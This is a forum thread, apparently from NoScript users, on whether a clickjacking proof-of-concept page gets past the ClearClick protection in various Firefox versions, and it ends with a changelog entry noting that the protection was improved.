ClearClick Bypass?

[Howdy]

http://lcamtuf.coredump.cx/clickit/ doesn't seem to trigger ClearClick.

[Tom T.]

There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)". That was good enough for me not to allow it. (except as an experiment, of course.)

And the attack does nothing at all if you don't allow script at the attacker's site.

If you'd like to see something interesting, go to the linked site, do *not* allow any script, and click the link "can be made seamless". The guts get exposed.

I can't immediately find the thread in which Giorgio explained to another user that the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.

Side note: For best safety, in Firefox Tools > Options > Content > Enable JavaScript > Advanced, uncheck *all* boxes on the pop-up box. "Allow scripts to..."

[therube]

> There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)".
> the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.

I saw neither the warning nor the yellow bar?

> And the attack does nothing at all if you don't allow script at the attacker's site.

Not necessarily.
If the attackers site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)

Not sure if "clickit" falls under the definition of "Clickjacking/ClearClick".

In any case, IMO, the POC is valid, it works.

[Tom T.]

There is a warning at the top of the browser, "This website has asked to redirect to (the fake bank site)".
> the yellow bar at the top means it isn't a true clickjack attack, but just more NoScript protection against JS redirects.

I saw neither the warning nor the yellow bar?

It took several iterations of "playing the game"

> And the attack does nothing at all if you don't allow script at the attacker's site.

Not necessarily.
If the attackers site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)

Perhaps on Fx 8.x or the equivalent SM, But on Fx 3.6.24, default-denying the site's JS means that clicking the POC button produced "no action at all".
Perhaps it is another "improvement" in newer Fx and SM.

Not sure if "clickit" falls under the definition of "Clickjacking/ClearClick".

Agreed, it was more of a JS redirect. True clickjacking would nvolve layered elements, which I did not see in a brief glance.

In any case, IMO, the POC is valid, it works.

It didn't for me, until the POC site's JS was TA'd. And i got the "warning" after playing the "game" several times.
And at the other link cited, it produced a blank page, listing all the scripts that were blocked (in the page, not just the NS menu)

Perhaps a difference from older Fx/SM, but a regression, IMHO. YMMV.

[therube]

Not necessarily.
If the attackers site is not allowed, JavaScript is not allowed to run on that site. But JavaScript need not necessarily be required. (You would think in most cases it is, but still.)

Perhaps on Fx 8.x or the equivalent SM, But on Fx 3.6.24, default-denying the site's JS means that clicking the POC button produced "no action at all".
Perhaps it is another "improvement" in newer Fx and SM.

In this instance, I was speaking in general, & not specifically about the particular POC.

Just pointing out that JavaScript is not a prerequisite for "malware".

v 2.2.4rc2
==========================================================================
+ [ClearClick] Enhanced protection against same-window timing attacks
with moving pointer (thanks Michal Zalewski for PoC)

Could you explain what we're supposed to see, or not, cause I'm not sure I'm seeing any change?

Congratulations, you won!

So I suppose I lost .